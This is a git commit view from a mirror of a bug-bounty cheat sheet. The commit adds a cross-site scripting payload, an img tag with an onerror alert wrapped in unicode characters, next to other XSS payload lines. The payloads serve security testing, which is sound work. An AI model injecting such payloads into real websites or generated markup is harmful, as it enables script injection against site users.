mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-24 20:13:06 +00:00
Add unicode XSS payload.
This commit is contained in:
parent
f0396aa116
commit
2842feec7b
1 changed files with 6 additions and 0 deletions
|
@ -116,6 +116,12 @@ XSS[JavaScript:alert(1)]
|
|||
__ javascript:alert(document.domain)
|
||||
```
|
||||
|
||||
**Unicode characters**
|
||||
|
||||
```html
|
||||
†‡•<img src=a onerror=javascript:alert('hacked')>…‰€
|
||||
```
|
||||
|
||||
**AngularJS Template Injection based XSS**
|
||||
|
||||
*For manual verification on a live target, use `angular.version` in your browser console*
|
||||
|
|
Loading…
Reference in a new issue